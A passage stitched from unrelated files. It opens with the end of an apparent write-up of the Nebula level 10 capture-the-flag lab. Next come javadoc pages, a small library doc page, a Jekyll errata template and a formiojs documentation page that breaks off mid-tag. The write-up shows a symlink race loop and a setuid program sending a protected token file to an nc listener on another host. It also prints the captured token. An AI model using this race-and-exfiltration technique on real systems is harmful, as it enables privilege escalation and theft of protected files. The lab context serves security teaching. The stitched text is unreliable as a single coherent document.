command “ln”? Is there enough delay between our link and our access permissions? While true?</p> <p>Personal system:</p> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@yourcomputer:~$</span> nc <span class="nt">-lk</span> 18211 <span class="go">"k" for "non-stop listening". </span></code></pre></div></div> <p>Nebula system (terminal 1):</p> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">level10@nebula:~$</span> <span class="nb">cd</span> /tmp <span class="gp">level10@nebula:/tmp$</span> <span class="k">while </span><span class="nb">true</span><span class="p">;</span> <span class="k">do </span><span class="nb">ln</span> <span class="nt">-sf</span> /home/flag10/token <span class="nb">test</span><span class="p">;</span> <span class="nb">ln</span> <span class="nt">-sf</span> /tmp/token <span class="nb">test</span><span class="p">;</span> <span class="k">done</span> </code></pre></div></div> <p>Nebula system (terminal 2):</p> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">level10@nebula:/tmp$</span> <span class="nb">cd</span> /tmp/ <span class="gp">level10@nebula:/tmp$</span> <span class="nb">ls</span> <span class="nt">-al</span> <span class="go">total 4 drwxrwxrwt 4 root root 120 Nov 6 14:13 . drwxr-xr-x 1 root root 220 Nov 6 13:24 .. drwxrwxrwt 2 root root 40 Nov 6 13:24 .ICE-unix drwxrwxrwt 2 root root 40 Nov 6 13:24 .X11-unix </span><span class="gp">lrwxrwxrwx 1 level10 level10 18 Nov 6 14:13 test -&gt;</span> /home/flag10/token <span class="go">-rw-rw-r-- 1 level10 level10 25 Nov 6 13:46 token </span><span class="gp">level10@nebula:/tmp$</span> <span class="k">while </span><span class="nb">true</span><span class="p">;</span> <span class="k">do</span> /home/flag10/flag10 /tmp/token 192.168.56.1<span class="p">;</span> <span class="k">done</span> <span class="go">Connecting to 192.168.56.1:18211 .. Connected! Sending file .. wrote file! Connecting to 192.168.56.1:18211 .. Connected! Sending file .. wrote file! Connecting to 192.168.56.1:18211 .. Connected! Sending file .. wrote file! Connecting to 192.168.56.1:18211 .. Connected! </span><span class="gp">&lt; sniiiiiiiiip &gt;</span> </code></pre></div></div> <p>Personal system:</p> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@yourcomputer:~$</span> nc <span class="nt">-lk</span> 18211 <span class="go">.oO Oo. Here I have full access. .oO Oo. Here I have full access. .oO Oo. Here I have full access. .oO Oo. Here I have full access. .oO Oo. Here I have full access. .oO Oo. Here I have full access. .oO Oo. Here I have full access. .oO Oo. Here I have full access. </span><span class="gp">&lt; sniiiiip &gt;</span> <span class="go"> .oO Oo. 615a2ce1-b2b5-4c76-8eed-8aa5c4015c27 </span></code></pre></div></div> <p>And for the big final of our race condition:</p> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">level10@nebula:~$</span> ssh flag10@localhost <span class="go">The authenticity of host 'localhost (127.0.0.1)' can't be established. ECDSA key fingerprint is ea:8d:09:1d:f1:69:e6:1e:55:c7:ec:e9:76:a1:37:f0. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts. _ __ __ __ / | / /__ / /_ __ __/ /___ _ / |/ / _ \/ __ \/ / / / / __ `/ / /| / __/ /_/ / /_/ / / /_/ / /_/ |_/\___/_.___/\__,_/_/\__,_/ exploit-exercises.com/nebula For level descriptions, please see the above URL. To log in, use the username of "levelXX" and password "levelXX", where XX is the level number. Currently there are 20 levels (00 - 19). flag10@localhost's password: Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-generic i686) * Documentation: https://help.ubuntu.com/ New release '12.04 LTS' available. Run 'do-release-upgrade' to upgrade to it. </span><span class="gp">The programs included with the Ubuntu system are free software;</span> <span class="go">the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. </span><span class="gp">flag10@nebula:~$</span> getflag <span class="go">You have successfully executed getflag on a target account </span><span class="gp">flag10@nebula:~$</span> </code></pre></div></div> </div> <hr> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- all pages --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-0255642880549652" data-ad-slot="6220756861" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> <div class="post-comments" itemprop="comment"> <hr /> <h1>Comments</h1> <div id="disqus_thread"></div> <script> /** * RECOMMENDED CONFIGURATION VARIABLES: EDIT AND UNCOMMENT THE SECTION BELOW TO INSERT DYNAMIC VALUES FROM YOUR PLATFORM OR CMS. * LEARN WHY DEFINING THESE VARIABLES IS IMPORTANT: https://disqus.com/admin/universalcode/#configuration-variables*/ /* var disqus_config = function () { this.page.url = PAGE_URL; // Replace PAGE_URL with your page's canonical URL variable this.page.identifier = PAGE_IDENTIFIER; // Replace PAGE_IDENTIFIER with your page's unique identifier variable }; */ (function() { // DON'T EDIT BELOW THIS LINE var d = document, s = d.createElement('script'); s.src = 'https://nitesculucian.disqus.com/embed.js'; s.setAttribute('data-timestamp', +new Date()); (d.head || d.body).appendChild(s); })(); </script> <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript> </div> </article> </div> </main> <footer class="site-footer"> <div class="wrapper"> <p> &copy; Lucian Nitescu - Powered by <a href="https://jekyllrb.com">Jekyll</a> &amp; <a href="https://github.com/yous/whiteglass">whiteglass</a> - Subscribe via <a href="https://nitesculucian.github.io/feed.xml">RSS</a> | <a href="/privacy-policy" >Privacy Policy</a> | <a href="/legal-disclaimer" >Legal Disclaimer</a> </p> </div> </footer> </body> </html>
NitescuLucian/NitescuLucian.github.io
2018/07/16/exploit-exercises-nebula-level-10/index.html
HTML
mit
29,652
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (1.8.0_102) on Mon Jan 23 16:37:41 GMT 2017 --> <title>Resource</title> <meta name="date" content="2017-01-23"> <link rel="stylesheet" type="text/css" href="../../../stylesheet.css" title="Style"> <script type="text/javascript" src="../../../script.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Resource"; } } catch(err) { } //--> var methods = {"i0":9,"i1":9}; var tabs = {65535:["t0","All Methods"],1:["t1","Static Methods"],8:["t4","Concrete Methods"]}; var altColor = "altColor"; var rowColor = "rowColor"; var tableTab = "tableTab"; var activeTableTab = "activeTableTab"; </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../me/gandhiinc/blindeye/package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/Resource.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../index-files/index-1.html">Index</a></li> <li><a href="../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../me/gandhiinc/blindeye/Pub.html" title="class in me.gandhiinc.blindeye"><span class="typeNameLink">Prev&nbsp;Class</span></a></li> <li><a href="../../../me/gandhiinc/blindeye/Roboticon.html" title="class in me.gandhiinc.blindeye"><span class="typeNameLink">Next&nbsp;Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../index.html?me/gandhiinc/blindeye/Resource.html" target="_top">Frames</a></li> <li><a href="Resource.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li><a href="#enum.constant.summary">Enum Constants</a>&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#method.summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li><a href="#enum.constant.detail">Enum Constants</a>&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#method.detail">Method</a></li> </ul> </div> <a name="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">me.gandhiinc.blindeye</div> <h2 title="Enum Resource" class="title">Enum Resource</h2> </div> <div class="contentContainer"> <ul class="inheritance"> <li>java.lang.Object</li> <li> <ul class="inheritance"> <li>java.lang.Enum&lt;<a href="../../../me/gandhiinc/blindeye/Resource.html" title="enum in me.gandhiinc.blindeye">Resource</a>&gt;</li> <li> <ul class="inheritance"> <li>me.gandhiinc.blindeye.Resource</li> </ul> </li> </ul> </li> </ul> <div class="description"> <ul class="blockList"> <li class="blockList"> <dl> <dt>All Implemented Interfaces:</dt> <dd>java.io.Serializable, java.lang.Comparable&lt;<a href="../../../me/gandhiinc/blindeye/Resource.html" title="enum in me.gandhiinc.blindeye">Resource</a>&gt;</dd> </dl> <hr> <br> <pre>public enum <span class="typeNameLabel">Resource</span> extends java.lang.Enum&lt;<a href="../../../me/gandhiinc/blindeye/Resource.html" title="enum in me.gandhiinc.blindeye">Resource</a>&gt;</pre> <div class="block">Enumeration of resource types</div> <dl> <dt><span class="simpleTagLabel">Author:</span></dt> <dd>ras570</dd> </dl> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- =========== ENUM CONSTANT SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="enum.constant.summary"> <!-- --> </a> <h3>Enum Constant Summary</h3> <table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Enum Constant Summary table, listing enum constants, and an explanation"> <caption><span>Enum Constants</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colOne" scope="col">Enum Constant and Description</th> </tr> <tr class="altColor"> <td class="colOne"><code><span class="memberNameLink"><a href="../../../me/gandhiinc/blindeye/Resource.html#ENERGY">ENERGY</a></span></code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colOne"><code><span class="memberNameLink"><a href="../../../me/gandhiinc/blindeye/Resource.html#NONE">NONE</a></span></code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colOne"><code><span class="memberNameLink"><a href="../../../me/gandhiinc/blindeye/Resource.html#ORE">ORE</a></span></code>&nbsp;</td> </tr> </table> </li> </ul> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method.summary"> <!-- --> </a> <h3>Method Summary</h3> <table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation"> <caption><span id="t0" class="activeTableTab"><span>All Methods</span><span class="tabEnd">&nbsp;</span></span><span id="t1" class="tableTab"><span><a href="javascript:show(1);">Static Methods</a></span><span class="tabEnd">&nbsp;</span></span><span id="t4" class="tableTab"><span><a href="javascript:show(8);">Concrete Methods</a></span><span class="tabEnd">&nbsp;</span></span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tr id="i0" class="altColor"> <td class="colFirst"><code>static <a href="../../../me/gandhiinc/blindeye/Resource.html" title="enum in me.gandhiinc.blindeye">Resource</a></code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../me/gandhiinc/blindeye/Resource.html#valueOf-java.lang.String-">valueOf</a></span>(java.lang.String&nbsp;name)</code> <div class="block">Returns the enum constant of this type with the specified name.</div> </td> </tr> <tr id="i1" class="rowColor"> <td class="colFirst"><code>static <a href="../../../me/gandhiinc/blindeye/Resource.html" title="enum in me.gandhiinc.blindeye">Resource</a>[]</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../me/gandhiinc/blindeye/Resource.html#values--">values</a></span>()</code> <div class="block">Returns an array containing the constants of this enum type, in the order they are declared.</div> </td> </tr> </table> <ul class="blockList"> <li class="blockList"><a name="methods.inherited.from.class.java.lang.Enum"> <!-- --> </a> <h3>Methods inherited from class&nbsp;java.lang.Enum</h3> <code>clone, compareTo, equals, finalize, getDeclaringClass, hashCode, name, ordinal, toString, valueOf</code></li> </ul> <ul class="blockList"> <li class="blockList"><a name="methods.inherited.from.class.java.lang.Object"> <!-- --> </a> <h3>Methods inherited from class&nbsp;java.lang.Object</h3> <code>getClass, notify, notifyAll, wait, wait, wait</code></li> </ul> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- ============ ENUM CONSTANT DETAIL =========== --> <ul class="blockList"> <li class="blockList"><a name="enum.constant.detail"> <!-- --> </a> <h3>Enum Constant Detail</h3> <a name="NONE"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>NONE</h4> <pre>public static final&nbsp;<a href="../../../me/gandhiinc/blindeye/Resource.html" title="enum in me.gandhiinc.blindeye">Resource</a> NONE</pre> </li> </ul> <a name="ORE"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>ORE</h4> <pre>public static final&nbsp;<a href="../../../me/gandhiinc/blindeye/Resource.html" title="enum in me.gandhiinc.blindeye">Resource</a> ORE</pre> </li> </ul> <a name="ENERGY"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>ENERGY</h4> <pre>public static final&nbsp;<a href="../../../me/gandhiinc/blindeye/Resource.html" title="enum in me.gandhiinc.blindeye">Resource</a> ENERGY</pre> </li> </ul> </li> </ul> <!-- ============ METHOD DETAIL ========== --> <ul class="blockList"> <li class="blockList"><a name="method.detail"> <!-- --> </a> <h3>Method Detail</h3> <a name="values--"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>values</h4> <pre>public static&nbsp;<a href="../../../me/gandhiinc/blindeye/Resource.html" title="enum in me.gandhiinc.blindeye">Resource</a>[]&nbsp;values()</pre> <div class="block">Returns an array containing the constants of this enum type, in the order they are declared. This method may be used to iterate over the constants as follows: <pre> for (Resource c : Resource.values()) &nbsp; System.out.println(c); </pre></div> <dl> <dt><span class="returnLabel">Returns:</span></dt> <dd>an array containing the constants of this enum type, in the order they are declared</dd> </dl> </li> </ul> <a name="valueOf-java.lang.String-"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>valueOf</h4> <pre>public static&nbsp;<a href="../../../me/gandhiinc/blindeye/Resource.html" title="enum in me.gandhiinc.blindeye">Resource</a>&nbsp;valueOf(java.lang.String&nbsp;name)</pre> <div class="block">Returns the enum constant of this type with the specified name. The string must match <i>exactly</i> an identifier used to declare an enum constant in this type. (Extraneous whitespace characters are not permitted.)</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>name</code> - the name of the enum constant to be returned.</dd> <dt><span class="returnLabel">Returns:</span></dt> <dd>the enum constant with the specified name</dd> <dt><span class="throwsLabel">Throws:</span></dt> <dd><code>java.lang.IllegalArgumentException</code> - if this enum type has no constant with the specified name</dd> <dd><code>java.lang.NullPointerException</code> - if the argument is null</dd> </dl> </li> </ul> </li> </ul> </li> </ul> </div> </div> <!-- ========= END OF CLASS DATA ========= --> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../me/gandhiinc/blindeye/package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/Resource.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../index-files/index-1.html">Index</a></li> <li><a href="../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../me/gandhiinc/blindeye/Pub.html" title="class in me.gandhiinc.blindeye"><span class="typeNameLink">Prev&nbsp;Class</span></a></li> <li><a href="../../../me/gandhiinc/blindeye/Roboticon.html" title="class in me.gandhiinc.blindeye"><span class="typeNameLink">Next&nbsp;Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../index.html?me/gandhiinc/blindeye/Resource.html" target="_top">Frames</a></li> <li><a href="Resource.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li><a href="#enum.constant.summary">Enum Constants</a>&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#method.summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li><a href="#enum.constant.detail">Enum Constants</a>&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#method.detail">Method</a></li> </ul> </div> <a name="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
SEPR-York/SEPR-York.github.io
olddoc/me/gandhiinc/blindeye/Resource.html
HTML
mit
13,003
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_14) on Sun Nov 04 20:19:10 CET 2012 --> <TITLE> Uses of Class org.lwjgl.opencl.CL10GL (LWJGL API) </TITLE> <META NAME="date" CONTENT="2012-11-04"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Class org.lwjgl.opencl.CL10GL (LWJGL API)"; } } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <HR> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../org/lwjgl/opencl/CL10GL.html" title="class in org.lwjgl.opencl"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../index.html?org/lwjgl/opencl/\class-useCL10GL.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="CL10GL.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <CENTER> <H2> <B>Uses of Class<br>org.lwjgl.opencl.CL10GL</B></H2> </CENTER> No usage of org.lwjgl.opencl.CL10GL <P> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../org/lwjgl/opencl/CL10GL.html" title="class in org.lwjgl.opencl"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../index.html?org/lwjgl/opencl/\class-useCL10GL.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="CL10GL.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> <i>Copyright &#169; 2002-2009 lwjgl.org. All Rights Reserved.</i> </BODY> </HTML>
jmcomets/tropical-escape
lib/lwjgl/javadoc/org/lwjgl/opencl/class-use/CL10GL.html
HTML
mit
5,956
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <!-- algo.qdoc --> <title>&lt;algo.h&gt; - algo | Algo </title> <link rel="stylesheet" type="text/css" href="style/offline.css" /> </head> <body> <div class="header" id="qtdocheader"> <div class="main"> <div class="main-rounded"> <div class="navigationbar"> <ul> <li>&lt;algo.h&gt; - algo</li> </ul> </div> </div> <div class="content"> <div class="line"> <div class="content mainContent"> <div class="sidebar"><div class="sidebar-content" id="sidebar-content"></div></div> <h1 class="title">&lt;algo.h&gt; - algo</h1> <span class="subtitle"></span> <!-- $$$<algo.h>-brief --> <p>Includes all the Algo library <a href="#details">More...</a></p> <!-- @@@<algo.h> --> <ul> </ul> <!-- $$$<algo.h>-description --> <div class="descr"> <a name="details"></a> <p>This file includes all the content of this library.</p> </div> <!-- @@@<algo.h> --> </div> </div> </div> </div> </div> </body> </html>
baz1/Algo
doc/algo-h.html
HTML
mit
1,096
--- layout: default title: Errata from the First Edition description: Sometimes we screw up, sometimes things change. Regardless, books sometimes contain errors. This page contains notes on those we’ve found in the First Edition of Adaptive Web Design. permalink: /1st-edition/errata/ --- <p>Sometimes we screw up, sometimes things change. Regardless, books sometimes contain errors. Below are notes on these from the First Edition of <cite>Adaptive Web Design</cite>.</p> {% for errata in site.data.errata-1st-edition %} {% if forloop.first %} <ul class="errata"> {% endif %} {% include errata.html %} {% if forloop.last %} </ul> {% endif %} {% else %} <p>No errata has been discovered… yet.</p> {% endfor %}
aarongustafson/adaptivewebdesign.info
1st-edition/errata.html
HTML
mit
729
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <base data-ice="baseUrl" href="../../../../../"> <title data-ice="title">src/templates/bootstrap/modaldialog/index.js | formiojs</title> <link type="text/css" rel="stylesheet" href="css/style.css"> <link type="text/css" rel="stylesheet" href="css/prettify-tomorrow.css"> <script src="script/prettify/prettify.js"></script> <script src="script/manual.js"></script> <meta name="description" content="JavaScript powered Forms with JSON Form Builder"><meta property="twitter:card" content="summary"><meta property="twitter:title" content="formiojs"><meta property="twitter:description" content="JavaScript powered Forms with JSON Form Builder"></head> <body class="layout-container" data-ice="rootContainer"> <header> <a href="./">Home</a> <a href="identifiers.html">Reference</a> <a href="source.html">Source</a> <div class="search-box"> <span> <img src="./image/search.png"> <span class="search-input-edge"></span><input class="search-input"><span class="search-input-edge"></span> </span> <ul class="search-result"></ul> </div> <a style="position:relative; top:3px;" href="https://github.com/formio/formio.js"><img width="20px" src="./image/github.png"></a></header> <nav class="navigation" data-ice="nav"><div> <ul> <li data-ice="doc"><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/EventEmitter.js~EventEmitter.html">EventEmitter</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/Form.js~Form.html">Form</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/FormBuilder.js~FormBuilder.html">FormBuilder</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/Formio.js~Formio.html">Formio</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/PDFBuilder.js~PDFBuilder.html">PDFBuilder</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/WizardBuilder.js~WizardBuilder.html">WizardBuilder</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-function">F</span><span data-ice="name"><span><a href="function/index.html#static-function-embed">embed</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-variable">V</span><span data-ice="name"><span><a href="variable/index.html#static-variable-GlobalFormio">GlobalFormio</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#addons">addons</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/addons/FormioAddon.js~FormioAddon.html">FormioAddon</a></span></span></li> <li data-ice="doc"><span data-ice="kind" class="kind-variable">V</span><span data-ice="name"><span><a href="variable/index.html#static-variable-editForms">editForms</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#builders">builders</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/builders/Builders.js~Builders.html">Builders</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components">components</a><span data-ice="kind" class="kind-class">C</span><span data-ice="name"><span><a href="class/src/components/Components.js~Components.html">Components</a></span></span></li> <li data-ice="doc"><a data-ice="dirPath" class="nav-dir-path" href="identifiers.html#components--classes-component">components/_classes/component</a><span 